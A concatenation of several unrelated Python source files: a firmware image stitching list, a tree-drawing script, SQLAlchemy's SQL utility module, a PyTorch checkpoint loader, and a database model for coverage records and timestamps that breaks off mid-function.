('PADDING.bin', '', 0x180, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_FWU.bin', [
('FWUPDATE.bin' , 'Lzma', self.FWUPDATE_SIZE, STITCH_OPS.MODE_FILE_PAD | fwu_flag, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_FB.bin', [
('SPI_IAS1.bin', '', self.SPI_IAS1_SIZE, STITCH_OPS.MODE_FILE_PAD | ias1_flag, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_PLD.bin', [
('PAYLOAD.bin', 'Lz4', self.PAYLOAD_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_VAR.bin', [
('VARIABLE.bin', '', self.VARIABLE_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_MRCDATA.bin', [
('MRCDATA.bin', '', self.MRCDATA_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_CFGDATA.bin', [
('CFGDATA.bin', '', self.CFGDATA_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_KEYHASH.bin', [
('KEYHASH.bin', '', self.KEYHASH_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_OBB.bin', [
('STAGE2.fd', 'Lz4', self.STAGE2_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_IBBM.bin', [
('STAGE1B.fd', 'Lz4', self.STAGE1B_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_IBBL.bin', [
('STAGE1A.fd', '', self.STAGE1A_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_EPLD.bin', [
('EPAYLOAD.bin', '', self.EPAYLOAD_SIZE, STITCH_OPS.MODE_FILE_PAD, STITCH_OPS.MODE_POS_TAIL)]
),
('Stitch_UVAR.bin', [
('UEFIVARIABLE.bin', '', self.UEFI_VARIABLE_SIZE, STITCH_OPS.MODE_FILE_NOP, STITCH_OPS.MODE_POS_TAIL)],
),
])
return img_list
|
py | 1a3f7d233b700bf20b859088661edd66b35a9b84 | from gen import Tree
from demo_trees import trees
import ws1
reload(ws1)
from ws1 import layout
t = layout(trees[4])
r = 30
rh = r*1.5
rw = r*1.5
stroke(0)
def drawt(root, depth):
global r
oval(root.x * rw, depth * rh, r, r)
print root.x
for child in root.children:
drawt(child, depth+1)
def drawconn(root, depth):
for child in root.children:
line(root.x * rw + (r/2), depth * rh + (r/2),
child.x * rw + (r/2), (depth+1) * rh + (r/2))
drawconn(child, depth+1)
size(1000, 500)
translate(2, 2)
stroke(0)
drawconn(t, 0)
fill(1,1,1)
drawt(t, 0) |
py | 1a3f7d2f8fdf299395daf5de798143893734973b | # sql/util.py
# Copyright (C) 2005-2011 the SQLAlchemy authors and contributors <see AUTHORS file>
#
# This module is part of SQLAlchemy and is released under
# the MIT License: http://www.opensource.org/licenses/mit-license.php
from sqlalchemy import exc, schema, util, sql, types as sqltypes
from sqlalchemy.util import topological
from sqlalchemy.sql import expression, operators, visitors
from itertools import chain
"""Utility functions that build upon SQL and Schema constructs."""
def sort_tables(tables):
"""sort a collection of Table objects in order of their foreign-key dependency."""
tables = list(tables)
tuples = []
def visit_foreign_key(fkey):
if fkey.use_alter:
return
parent_table = fkey.column.table
if parent_table in tables:
child_table = fkey.parent.table
if parent_table is not child_table:
tuples.append((parent_table, child_table))
for table in tables:
visitors.traverse(table,
{'schema_visitor':True},
{'foreign_key':visit_foreign_key})
tuples.extend(
[parent, table] for parent in table._extra_dependencies
)
return list(topological.sort(tuples, tables))
def find_join_source(clauses, join_to):
"""Given a list of FROM clauses and a selectable,
return the first index and element from the list of
clauses which can be joined against the selectable. returns
None, None if no match is found.
e.g.::
clause1 = table1.join(table2)
clause2 = table4.join(table5)
join_to = table2.join(table3)
find_join_source([clause1, clause2], join_to) == clause1
"""
selectables = list(expression._from_objects(join_to))
for i, f in enumerate(clauses):
for s in selectables:
if f.is_derived_from(s):
return i, f
else:
return None, None
def find_tables(clause, check_columns=False,
include_aliases=False, include_joins=False,
include_selects=False, include_crud=False):
"""locate Table objects within the given expression."""
tables = []
_visitors = {}
if include_selects:
_visitors['select'] = _visitors['compound_select'] = tables.append
if include_joins:
_visitors['join'] = tables.append
if include_aliases:
_visitors['alias'] = tables.append
if include_crud:
_visitors['insert'] = _visitors['update'] = \
_visitors['delete'] = lambda ent: tables.append(ent.table)
if check_columns:
def visit_column(column):
tables.append(column.table)
_visitors['column'] = visit_column
_visitors['table'] = tables.append
visitors.traverse(clause, {'column_collections':False}, _visitors)
return tables
def find_columns(clause):
"""locate Column objects within the given expression."""
cols = util.column_set()
visitors.traverse(clause, {}, {'column':cols.add})
return cols
def clause_is_present(clause, search):
"""Given a target clause and a second to search within, return True
if the target is plainly present in the search without any
subqueries or aliases involved.
Basically descends through Joins.
"""
stack = [search]
while stack:
elem = stack.pop()
if clause is elem:
return True
elif isinstance(elem, expression.Join):
stack.extend((elem.left, elem.right))
return False
def bind_values(clause):
"""Return an ordered list of "bound" values in the given clause.
E.g.::
>>> expr = and_(
... table.c.foo==5, table.c.foo==7
... )
>>> bind_values(expr)
[5, 7]
"""
v = []
def visit_bindparam(bind):
value = bind.value
# evaluate callables
if callable(value):
value = value()
v.append(value)
visitors.traverse(clause, {}, {'bindparam':visit_bindparam})
return v
def _quote_ddl_expr(element):
if isinstance(element, basestring):
element = element.replace("'", "''")
return "'%s'" % element
else:
return repr(element)
def expression_as_ddl(clause):
"""Given a SQL expression, convert for usage in DDL, such as
CREATE INDEX and CHECK CONSTRAINT.
Converts bind params into quoted literals, column identifiers
into detached column constructs so that the parent table
identifier is not included.
"""
def repl(element):
if isinstance(element, expression._BindParamClause):
return expression.literal_column(_quote_ddl_expr(element.value))
elif isinstance(element, expression.ColumnClause) and \
element.table is not None:
return expression.column(element.name)
else:
return None
return visitors.replacement_traverse(clause, {}, repl)
def adapt_criterion_to_null(crit, nulls):
"""given criterion containing bind params, convert selected elements to IS NULL."""
def visit_binary(binary):
if isinstance(binary.left, expression._BindParamClause) and binary.left.key in nulls:
# reverse order if the NULL is on the left side
binary.left = binary.right
binary.right = expression.null()
binary.operator = operators.is_
binary.negate = operators.isnot
elif isinstance(binary.right, expression._BindParamClause) and binary.right.key in nulls:
binary.right = expression.null()
binary.operator = operators.is_
binary.negate = operators.isnot
return visitors.cloned_traverse(crit, {}, {'binary':visit_binary})
def join_condition(a, b, ignore_nonexistent_tables=False, a_subset=None):
"""create a join condition between two tables or selectables.
e.g.::
join_condition(tablea, tableb)
would produce an expression along the lines of::
tablea.c.id==tableb.c.tablea_id
The join is determined based on the foreign key relationships
between the two selectables. If there are multiple ways
to join, or no way to join, an error is raised.
:param ignore_nonexistent_tables: Deprecated - this
flag is no longer used. Only resolution errors regarding
the two given tables are propagated.
:param a_subset: An optional expression that is a sub-component
of ``a``. An attempt will be made to join to just this sub-component
first before looking at the full ``a`` construct, and if found
will be successful even if there are other ways to join to ``a``.
This allows the "right side" of a join to be passed thereby
providing a "natural join".
"""
crit = []
constraints = set()
for left in (a_subset, a):
if left is None:
continue
for fk in sorted(
b.foreign_keys,
key=lambda fk:fk.parent._creation_order):
try:
col = fk.get_referent(left)
except exc.NoReferenceError, nrte:
if nrte.table_name == left.name:
raise
else:
continue
if col is not None:
crit.append(col == fk.parent)
constraints.add(fk.constraint)
if left is not b:
for fk in sorted(
left.foreign_keys,
key=lambda fk:fk.parent._creation_order):
try:
col = fk.get_referent(b)
except exc.NoReferenceError, nrte:
if nrte.table_name == b.name:
raise
else:
# this is totally covered. can't get
# coverage to mark it.
continue
if col is not None:
crit.append(col == fk.parent)
constraints.add(fk.constraint)
if crit:
break
if len(crit) == 0:
if isinstance(b, expression._FromGrouping):
hint = " Perhaps you meant to convert the right side to a "\
"subquery using alias()?"
else:
hint = ""
raise exc.ArgumentError(
"Can't find any foreign key relationships "
"between '%s' and '%s'.%s" % (a.description, b.description, hint))
elif len(constraints) > 1:
raise exc.ArgumentError(
"Can't determine join between '%s' and '%s'; "
"tables have more than one foreign key "
"constraint relationship between them. "
"Please specify the 'onclause' of this "
"join explicitly." % (a.description, b.description))
elif len(crit) == 1:
return (crit[0])
else:
return sql.and_(*crit)
class Annotated(object):
"""clones a ClauseElement and applies an 'annotations' dictionary.
Unlike regular clones, this clone also mimics __hash__() and
__cmp__() of the original element so that it takes its place
in hashed collections.
A reference to the original element is maintained, for the important
reason of keeping its hash value current. When GC'ed, the
hash value may be reused, causing conflicts.
"""
def __new__(cls, *args):
if not args:
# clone constructor
return object.__new__(cls)
else:
element, values = args
# pull appropriate subclass from registry of annotated
# classes
try:
cls = annotated_classes[element.__class__]
except KeyError:
cls = annotated_classes[element.__class__] = type.__new__(type,
"Annotated%s" % element.__class__.__name__,
(Annotated, element.__class__), {})
return object.__new__(cls)
def __init__(self, element, values):
# force FromClause to generate their internal
# collections into __dict__
if isinstance(element, expression.FromClause):
element.c
self.__dict__ = element.__dict__.copy()
self.__element = element
self._annotations = values
def _annotate(self, values):
_values = self._annotations.copy()
_values.update(values)
clone = self.__class__.__new__(self.__class__)
clone.__dict__ = self.__dict__.copy()
clone._annotations = _values
return clone
def _deannotate(self):
return self.__element
def _compiler_dispatch(self, visitor, **kw):
return self.__element.__class__._compiler_dispatch(self, visitor, **kw)
@property
def _constructor(self):
return self.__element._constructor
def _clone(self):
clone = self.__element._clone()
if clone is self.__element:
# detect immutable, don't change anything
return self
else:
# update the clone with any changes that have occurred
# to this object's __dict__.
clone.__dict__.update(self.__dict__)
return Annotated(clone, self._annotations)
def __hash__(self):
return hash(self.__element)
def __cmp__(self, other):
return cmp(hash(self.__element), hash(other))
# hard-generate Annotated subclasses. this technique
# is used instead of on-the-fly types (i.e. type.__new__())
# so that the resulting objects are pickleable.
annotated_classes = {}
for cls in expression.__dict__.values() + [schema.Column, schema.Table]:
if isinstance(cls, type) and issubclass(cls, expression.ClauseElement):
exec "class Annotated%s(Annotated, cls):\n" \
" pass" % (cls.__name__, ) in locals()
exec "annotated_classes[cls] = Annotated%s" % (cls.__name__)
def _deep_annotate(element, annotations, exclude=None):
"""Deep copy the given ClauseElement, annotating each element with the given annotations dictionary.
Elements within the exclude collection will be cloned but not annotated.
"""
def clone(elem):
# check if element is present in the exclude list.
# take into account proxying relationships.
if exclude and \
hasattr(elem, 'proxy_set') and \
elem.proxy_set.intersection(exclude):
elem = elem._clone()
elif annotations != elem._annotations:
elem = elem._annotate(annotations.copy())
elem._copy_internals(clone=clone)
return elem
if element is not None:
element = clone(element)
return element
def _deep_deannotate(element):
"""Deep copy the given element, removing all annotations."""
def clone(elem):
elem = elem._deannotate()
elem._copy_internals(clone=clone)
return elem
if element is not None:
element = clone(element)
return element
def splice_joins(left, right, stop_on=None):
if left is None:
return right
stack = [(right, None)]
adapter = ClauseAdapter(left)
ret = None
while stack:
(right, prevright) = stack.pop()
if isinstance(right, expression.Join) and right is not stop_on:
right = right._clone()
right._reset_exported()
right.onclause = adapter.traverse(right.onclause)
stack.append((right.left, right))
else:
right = adapter.traverse(right)
if prevright is not None:
prevright.left = right
if ret is None:
ret = right
return ret
def reduce_columns(columns, *clauses, **kw):
"""given a list of columns, return a 'reduced' set based on natural equivalents.
the set is reduced to the smallest list of columns which have no natural
equivalent present in the list. A "natural equivalent" means that two columns
will ultimately represent the same value because they are related by a foreign key.
\*clauses is an optional list of join clauses which will be traversed
to further identify columns that are "equivalent".
\**kw may specify 'ignore_nonexistent_tables' to ignore foreign keys
whose tables are not yet configured.
This function is primarily used to determine the most minimal "primary key"
from a selectable, by reducing the set of primary key columns present
in the the selectable to just those that are not repeated.
"""
ignore_nonexistent_tables = kw.pop('ignore_nonexistent_tables', False)
columns = util.ordered_column_set(columns)
omit = util.column_set()
for col in columns:
for fk in chain(*[c.foreign_keys for c in col.proxy_set]):
for c in columns:
if c is col:
continue
try:
fk_col = fk.column
except exc.NoReferencedTableError:
if ignore_nonexistent_tables:
continue
else:
raise
if fk_col.shares_lineage(c):
omit.add(col)
break
if clauses:
def visit_binary(binary):
if binary.operator == operators.eq:
cols = util.column_set(chain(*[c.proxy_set for c in columns.difference(omit)]))
if binary.left in cols and binary.right in cols:
for c in columns:
if c.shares_lineage(binary.right):
omit.add(c)
break
for clause in clauses:
visitors.traverse(clause, {}, {'binary':visit_binary})
return expression.ColumnSet(columns.difference(omit))
def criterion_as_pairs(expression, consider_as_foreign_keys=None,
consider_as_referenced_keys=None, any_operator=False):
"""traverse an expression and locate binary criterion pairs."""
if consider_as_foreign_keys and consider_as_referenced_keys:
raise exc.ArgumentError("Can only specify one of "
"'consider_as_foreign_keys' or "
"'consider_as_referenced_keys'")
def visit_binary(binary):
if not any_operator and binary.operator is not operators.eq:
return
if not isinstance(binary.left, sql.ColumnElement) or \
not isinstance(binary.right, sql.ColumnElement):
return
if consider_as_foreign_keys:
if binary.left in consider_as_foreign_keys and \
(binary.right is binary.left or
binary.right not in consider_as_foreign_keys):
pairs.append((binary.right, binary.left))
elif binary.right in consider_as_foreign_keys and \
(binary.left is binary.right or
binary.left not in consider_as_foreign_keys):
pairs.append((binary.left, binary.right))
elif consider_as_referenced_keys:
if binary.left in consider_as_referenced_keys and \
(binary.right is binary.left or
binary.right not in consider_as_referenced_keys):
pairs.append((binary.left, binary.right))
elif binary.right in consider_as_referenced_keys and \
(binary.left is binary.right or
binary.left not in consider_as_referenced_keys):
pairs.append((binary.right, binary.left))
else:
if isinstance(binary.left, schema.Column) and \
isinstance(binary.right, schema.Column):
if binary.left.references(binary.right):
pairs.append((binary.right, binary.left))
elif binary.right.references(binary.left):
pairs.append((binary.left, binary.right))
pairs = []
visitors.traverse(expression, {}, {'binary':visit_binary})
return pairs
def folded_equivalents(join, equivs=None):
"""Return a list of uniquely named columns.
The column list of the given Join will be narrowed
down to a list of all equivalently-named,
equated columns folded into one column, where 'equated' means they are
equated to each other in the ON clause of this join.
This function is used by Join.select(fold_equivalents=True).
Deprecated. This function is used for a certain kind of
"polymorphic_union" which is designed to achieve joined
table inheritance where the base table has no "discriminator"
column; [ticket:1131] will provide a better way to
achieve this.
"""
if equivs is None:
equivs = set()
def visit_binary(binary):
if binary.operator == operators.eq and binary.left.name == binary.right.name:
equivs.add(binary.right)
equivs.add(binary.left)
visitors.traverse(join.onclause, {}, {'binary':visit_binary})
collist = []
if isinstance(join.left, expression.Join):
left = folded_equivalents(join.left, equivs)
else:
left = list(join.left.columns)
if isinstance(join.right, expression.Join):
right = folded_equivalents(join.right, equivs)
else:
right = list(join.right.columns)
used = set()
for c in left + right:
if c in equivs:
if c.name not in used:
collist.append(c)
used.add(c.name)
else:
collist.append(c)
return collist
class AliasedRow(object):
"""Wrap a RowProxy with a translation map.
This object allows a set of keys to be translated
to those present in a RowProxy.
"""
def __init__(self, row, map):
# AliasedRow objects don't nest, so un-nest
# if another AliasedRow was passed
if isinstance(row, AliasedRow):
self.row = row.row
else:
self.row = row
self.map = map
def __contains__(self, key):
return self.map[key] in self.row
def has_key(self, key):
return key in self
def __getitem__(self, key):
return self.row[self.map[key]]
def keys(self):
return self.row.keys()
class ClauseAdapter(visitors.ReplacingCloningVisitor):
"""Clones and modifies clauses based on column correspondence.
E.g.::
table1 = Table('sometable', metadata,
Column('col1', Integer),
Column('col2', Integer)
)
table2 = Table('someothertable', metadata,
Column('col1', Integer),
Column('col2', Integer)
)
condition = table1.c.col1 == table2.c.col1
make an alias of table1::
s = table1.alias('foo')
calling ``ClauseAdapter(s).traverse(condition)`` converts
condition to read::
s.c.col1 == table2.c.col1
"""
def __init__(self, selectable, equivalents=None, include=None, exclude=None):
self.__traverse_options__ = {'column_collections':False, 'stop_on':[selectable]}
self.selectable = selectable
self.include = include
self.exclude = exclude
self.equivalents = util.column_dict(equivalents or {})
def _corresponding_column(self, col, require_embedded, _seen=util.EMPTY_SET):
newcol = self.selectable.corresponding_column(col, require_embedded=require_embedded)
if newcol is None and col in self.equivalents and col not in _seen:
for equiv in self.equivalents[col]:
newcol = self._corresponding_column(equiv, require_embedded=require_embedded, _seen=_seen.union([col]))
if newcol is not None:
return newcol
return newcol
def replace(self, col):
if isinstance(col, expression.FromClause):
if self.selectable.is_derived_from(col):
return self.selectable
if not isinstance(col, expression.ColumnElement):
return None
if self.include and col not in self.include:
return None
elif self.exclude and col in self.exclude:
return None
return self._corresponding_column(col, True)
class ColumnAdapter(ClauseAdapter):
"""Extends ClauseAdapter with extra utility functions.
Provides the ability to "wrap" this ClauseAdapter
around another, a columns dictionary which returns
adapted elements given an original, and an
adapted_row() factory.
"""
def __init__(self, selectable, equivalents=None,
chain_to=None, include=None,
exclude=None, adapt_required=False):
ClauseAdapter.__init__(self, selectable, equivalents, include, exclude)
if chain_to:
self.chain(chain_to)
self.columns = util.populate_column_dict(self._locate_col)
self.adapt_required = adapt_required
def wrap(self, adapter):
ac = self.__class__.__new__(self.__class__)
ac.__dict__ = self.__dict__.copy()
ac._locate_col = ac._wrap(ac._locate_col, adapter._locate_col)
ac.adapt_clause = ac._wrap(ac.adapt_clause, adapter.adapt_clause)
ac.adapt_list = ac._wrap(ac.adapt_list, adapter.adapt_list)
ac.columns = util.populate_column_dict(ac._locate_col)
return ac
adapt_clause = ClauseAdapter.traverse
adapt_list = ClauseAdapter.copy_and_process
def _wrap(self, local, wrapped):
def locate(col):
col = local(col)
return wrapped(col)
return locate
def _locate_col(self, col):
c = self._corresponding_column(col, True)
if c is None:
c = self.adapt_clause(col)
# anonymize labels in case they have a hardcoded name
if isinstance(c, expression._Label):
c = c.label(None)
# adapt_required indicates that if we got the same column
# back which we put in (i.e. it passed through),
# it's not correct. this is used by eagerloading which
# knows that all columns and expressions need to be adapted
# to a result row, and a "passthrough" is definitely targeting
# the wrong column.
if self.adapt_required and c is col:
return None
return c
def adapted_row(self, row):
return AliasedRow(row, self.columns)
def __getstate__(self):
d = self.__dict__.copy()
del d['columns']
return d
def __setstate__(self, state):
self.__dict__.update(state)
self.columns = util.PopulateDict(self._locate_col)
|
py | 1a3f7d7d0c880fa97c9bc28afce11ae01d03db01 | import torch
import os
from collections import OrderedDict
try:
from torch.hub import load_state_dict_from_url
except ImportError:
from torch.utils.model_zoo import load_url as load_state_dict_from_url
def load_checkpoint(model, checkpoint_path):
if checkpoint_path and os.path.isfile(checkpoint_path):
print("=> Loading checkpoint '{}'".format(checkpoint_path))
checkpoint = torch.load(checkpoint_path)
if isinstance(checkpoint, dict) and 'state_dict' in checkpoint:
new_state_dict = OrderedDict()
for k, v in checkpoint['state_dict'].items():
if k.startswith('module'):
name = k[7:] # remove `module.`
else:
name = k
new_state_dict[name] = v
model.load_state_dict(new_state_dict)
else:
model.load_state_dict(checkpoint)
print("=> Loaded checkpoint '{}'".format(checkpoint_path))
else:
print("=> Error: No checkpoint found at '{}'".format(checkpoint_path))
raise FileNotFoundError()
def load_pretrained(model, url, filter_fn=None, strict=True):
state_dict = load_state_dict_from_url(url, progress=False, map_location='cpu')
input_conv = 'conv_stem'
classifier = 'classifier'
in_chans = getattr(model, input_conv).weight.shape[1]
num_classes = getattr(model, classifier).weight.shape[0]
input_conv_weight = input_conv + '.weight'
pretrained_in_chans = state_dict[input_conv_weight].shape[1]
if in_chans != pretrained_in_chans:
if in_chans == 1:
print('=> Converting pretrained input conv {} from {} to 1 channel'.format(
input_conv_weight, pretrained_in_chans))
conv1_weight = state_dict[input_conv_weight]
state_dict[input_conv_weight] = conv1_weight.sum(dim=1, keepdim=True)
else:
print('=> Discarding pretrained input conv {} since input channel count != {}'.format(
input_conv_weight, pretrained_in_chans))
del state_dict[input_conv_weight]
strict = False
classifier_weight = classifier + '.weight'
pretrained_num_classes = state_dict[classifier_weight].shape[0]
if num_classes != pretrained_num_classes:
print('=> Discarding pretrained classifier since num_classes != {}'.format(pretrained_num_classes))
del state_dict[classifier_weight]
del state_dict[classifier + '.bias']
strict = False
if filter_fn is not None:
state_dict = filter_fn(state_dict)
model.load_state_dict(state_dict, strict=strict)
|
py | 1a3f7ec2904b58a990fe825dab0c17397541c799 | # encoding: utf-8
# BaseCoverageRecord, Timestamp, CoverageRecord, WorkCoverageRecord
from . import (
Base,
get_one,
get_one_or_create,
)
import datetime
from sqlalchemy import (
Column,
DateTime,
Enum,
ForeignKey,
Index,
Integer,
String,
Unicode,
UniqueConstraint,
)
from sqlalchemy.orm.session import Session
from sqlalchemy.sql.expression import (
and_,
or_,
literal,
literal_column,
)
class BaseCoverageRecord(object):
"""Contains useful constants used by both CoverageRecord and
WorkCoverageRecord.
"""
SUCCESS = u'success'
TRANSIENT_FAILURE = u'transient failure'
PERSISTENT_FAILURE = u'persistent failure'
REGISTERED = u'registered'
ALL_STATUSES = [REGISTERED, SUCCESS, TRANSIENT_FAILURE, PERSISTENT_FAILURE]
# Count coverage as attempted if the record is not 'registered'.
PREVIOUSLY_ATTEMPTED = [SUCCESS, TRANSIENT_FAILURE, PERSISTENT_FAILURE]
# By default, count coverage as present if it ended in
# success or in persistent failure. Do not count coverage
# as present if it ended in transient failure.
DEFAULT_COUNT_AS_COVERED = [SUCCESS, PERSISTENT_FAILURE]
status_enum = Enum(SUCCESS, TRANSIENT_FAILURE, PERSISTENT_FAILURE,
REGISTERED, name='coverage_status')
@classmethod
def not_covered(cls, count_as_covered=None,
count_as_not_covered_if_covered_before=None):
"""Filter a query to find only items without coverage records.
:param count_as_covered: A list of constants that indicate
types of coverage records that should count as 'coverage'
for purposes of this query.
:param count_as_not_covered_if_covered_before: If a coverage record
exists, but is older than the given date, do not count it as
covered.
:return: A clause that can be passed in to Query.filter().
"""
if not count_as_covered:
count_as_covered = cls.DEFAULT_COUNT_AS_COVERED
elif isinstance(count_as_covered, basestring):
count_as_covered = [count_as_covered]
# If there is no coverage record, then of course the item is
# not covered.
missing = cls.id==None
# If we're looking for specific coverage statuses, then a
# record does not count if it has some other status.
missing = or_(
missing, ~cls.status.in_(count_as_covered)
)
# If the record's timestamp is before the cutoff time, we
# don't count it as covered, regardless of which status it
# has.
if count_as_not_covered_if_covered_before:
missing = or_(
missing, cls.timestamp < count_as_not_covered_if_covered_before
)
return missing
class Timestamp(Base):
"""Tracks the activities of Monitors, CoverageProviders,
and general scripts.
"""
__tablename__ = 'timestamps'
MONITOR_TYPE = "monitor"
COVERAGE_PROVIDER_TYPE = "coverage_provider"
SCRIPT_TYPE = "script"
# A stand-in value used to indicate that a field in the timestamps
# table should be explicitly set to None. Passing in None for most
# fields will use default values.
CLEAR_VALUE = object()
service_type_enum = Enum(
MONITOR_TYPE, COVERAGE_PROVIDER_TYPE, SCRIPT_TYPE,
name="service_type",
)
# Unique ID
id = Column(Integer, primary_key=True)
# Name of the service.
service = Column(String(255), index=True, nullable=False)
# Type of the service -- monitor, coverage provider, or script.
# If the service type does not fit into these categories, this field
# can be left null.
service_type = Column(service_type_enum, index=True, default=None)
# The collection, if any, associated with this service -- some services
# run separately on a number of collections.
collection_id = Column(Integer, ForeignKey('collections.id'),
index=True, nullable=True)
# The last time the service _started_ running.
start = Column(DateTime, nullable=True)
# The last time the service _finished_ running. In most cases this
# is the 'timestamp' proper.
finish = Column(DateTime)
# A description of the things the service achieved during its last
# run. Each service may decide for itself what counts as an
# 'achievement'; this is just a way to distinguish services that
# do a lot of things from services that do a few things, or to see
# services that run to completion but don't actually do anything.
achievements = Column(Unicode, nullable=True)
# This column allows a service to keep one item of state between
# runs. For example, a monitor that iterates over a database table
# needs to keep track of the last database ID it processed.
counter = Column(Integer, nullable=True)
# The exception, if any, that stopped the service from running
# during its previous run.
exception = Column(Unicode, nullable=True)
def __repr__(self):
format = '%b %d, %Y at %H:%M'
if self.finish:
finish = self.finish.strftime(format)
else:
finish = None
if self.start:
start = self.start.strftime(format)
else:
start = None
if self.collection:
collection = self.collection.name
else:
collection = None
message = u"<Timestamp %s: collection=%s, start=%s finish=%s counter=%s>" % (
self.service, collection, start, finish, self.counter
)
return message
@classmethod
def lookup(cls, _db, service, service_type, collection):
return get_one(
_db, Timestamp, service=service, service_type=service_type,
collection=collection
)
@classmethod
def value(cls, _db, service, service_type, collection):
"""Return the current value of the given Timestamp, if it exists.
"""
stamp = cls.lookup(_db, service, service_type, collection)
if not stamp:
return None
return stamp.finish
@classmethod
def stamp(
cls, _db, service, service_type, collection=None, start=None,
finish=None, achievements=None, counter=None, exception=None
):
"""Set a Timestamp, creating it if necessary.
This should be called once a service has stopped running,
whether or not it was able to complete its task.
:param _db: A database connection.
:param service: The name of the service associated with the Timestamp.
:param service_type: The type of the service associated with
the Timestamp. This must be one of the values in
Timestmap.service_type_enum.
:param collection: The Collection, if any, on which this service
just ran.
:param start: The time at which this service started running.
Defaults to now.
:param finish: The time at which this service stopped running.
Defaults to now.
:param achievements: A human-readable description of what the service
did during its run.
:param counter: An integer item of state that the service may use
to track its progress between runs.
:param exception: A stack trace for the exception, if any, which
stopped the service from running.
"""
if start is None and finish is None:
start = finish = datetime.datetime.utcnow()
elif start is None:
start = finish
elif finish is None:
finish = start
stamp, was_new = get_one_or_create(
_db, Timestamp,
service=service,
service_type=service_type,
collection=collection,
)
stamp.update(start, finish, achievements, counter, exception)
# Committing immediately reduces the risk of contention.
_db.commit()
return stamp
def update(self, start=None, finish=None, achievements=None,
counter=None, exception=None):
"""Use a single method to update all the fields that aren't
used to identify a Timestamp.
"""
if start is not None:
if start is self.CLEAR_VALUE:
# In most cases, None is not a valid value for
# Timestamp.start, but this can be overridden.
start = None
self.start = start
if finish is not None:
if finish is self.CLEAR_VALUE:
# In most cases, None is not a valid value for
# Timestamp.finish, but this can be overridden.
finish = None
self.finish = finish
if achievements is not None:
if achievements is self.CLEAR_VALUE:
achievements = None
self.achievements = achievements
if counter is not None:
if counter is self.CLEAR_VALUE:
counter = None
self.counter = counter
# Unlike the other fields, None is the default value for
# .exception, so passing in None to mean "use the default" and
# None to mean "no exception" mean the same thing. But we'll
# support CLEAR_VALUE anyway.
if exception is self.CLEAR_VALUE:
exception = None
self.exception = exception
def to_data(self):
"""Convert this Timestamp to an unfinalized TimestampData."""
from ..metadata_layer import TimestampData
return TimestampData(
start=self.start, finish=self.finish,
achievements=self.achievements, counter=self.counter
)
__table_args__ = (
UniqueConstraint('service', 'collection_id'),
)
class CoverageRecord(Base, BaseCoverageRecord):
"""A record of a Identifier being used as input into some process."""
__tablename__ = 'coveragerecords'
SET_EDITION_METADATA_OPERATION = u'set-edition-metadata'
CHOOSE_COVER_OPERATION = u'choose-cover'
REAP_OPERATION = u'reap'
IMPORT_OPERATION = u'import'
RESOLVE_IDENTIFIER_OPERATION = u'resolve-identifier'
REPAIR_SORT_NAME_OPERATION = u'repair-sort-name'
METADATA_UPLOAD_OPERATION = u'metadata-upload'
id = Column(Integer, primary_key=True)
identifier_id = Column(
Integer, ForeignKey('identifiers.id'), index=True)
# If applicable, this is the ID of the data source that took the
# Identifier as input.
data_source_id = Column(
Integer, ForeignKey('datasources.id')
)
operation = Column(String(255), default=None)
timestamp = Column(DateTime, index=True)
status = Column(BaseCoverageRecord.status_enum, index=True)
exception = Column(Unicode, index=True)
# If applicable, this is the ID of the collection for which
# coverage has taken place. This is currently only applicable
# for Metadata Wrangler coverage.
collection_id = Column(
Integer, ForeignKey('collections.id'), nullable=True
)
__table_args__ = (
Index(
'ix_identifier_id_data_source_id_operation',
identifier_id, data_source_id, operation,
unique=True, postgresql_where=collection_id.is_(None)),
Index(
'ix_identifier_id_data_source_id_operation_collection_id',
identifier_id, data_source_id, operation, collection_id,
unique=True
),
)
def __repr__(self):
template = '<CoverageRecord: %(timestamp)s identifier=%(identifier_type)s/%(identifier)s data_source="%(data_source)s"%(operation)s status="%(status)s" %(exception)s>'
return self.human_readable(template)
def human_readable(self, template):
"""Interpolate data into a human-readable template."""
if self.operation:
operation = ' operation="%s"' % self.operation
else:
operation = ''
if self.exception:
exception = ' exception="%s"' % self.exception
else:
exception = ''
return template % dict(
timestamp=self.timestamp.strftime("%Y-%m-%d %H:%M:%S"),
identifier_type=self.identifier.type,
identifier=self.identifier.identifier,
data_source=self.data_source.name,
operation=operation,
status=self.status,
exception=exception,
)
@classmethod
def lookup(cls, edition_or_identifier, data_source, operation=None,
collection=None):
from datasource import DataSource
from edition import Edition
from identifier import Identifier
_db = Session.object_session(edition_or_identifier)
if isinstance(edition_or_identifier, Identifier):
identifier = edition_or_identifier
elif isinstance(edition_or_identifier, Edition):
identifier = edition_or_identifier.primary_identifier
else:
raise ValueError(
"Cannot look up a coverage record for %r." % edition)
if isinstance(data_source, basestring):
data_source = DataSource.lookup(_db, data_source)
return get_one(
_db, CoverageRecord,
identifier=identifier,
data_source=data_source,
operation=operation,
collection=collection,
on_multiple='interchangeable',
)
@classmethod
def add_for(self, edition, data_source, operation=None, timestamp=None,
status=BaseCoverageRecord.SUCCESS, collection=None):
from edition import Edition
from identifier import Identifier
_db = Session.object_session(edition)
if isinstance(edition, Identifier):
identifier = edition
elif isinstance(edition, Edition):
identifier = edition.primary_identifier
else:
raise ValueError(
"Cannot create a coverage record for %r." % edition)
timestamp = timestamp or datetime.datetime.utcnow()
coverage_record, is_new = get_one_or_create(
_db, CoverageRecord,
identifier=identifier,
data_source=data_source,
operation=operation,
collection=collection,
on_multiple='interchangeable'
)
coverage_record.status = status
coverage_record.timestamp = timestamp
return coverage_record, is_new
@classmethod
def bulk_add(cls, identifiers, data_source, operation=None, timestamp=None,
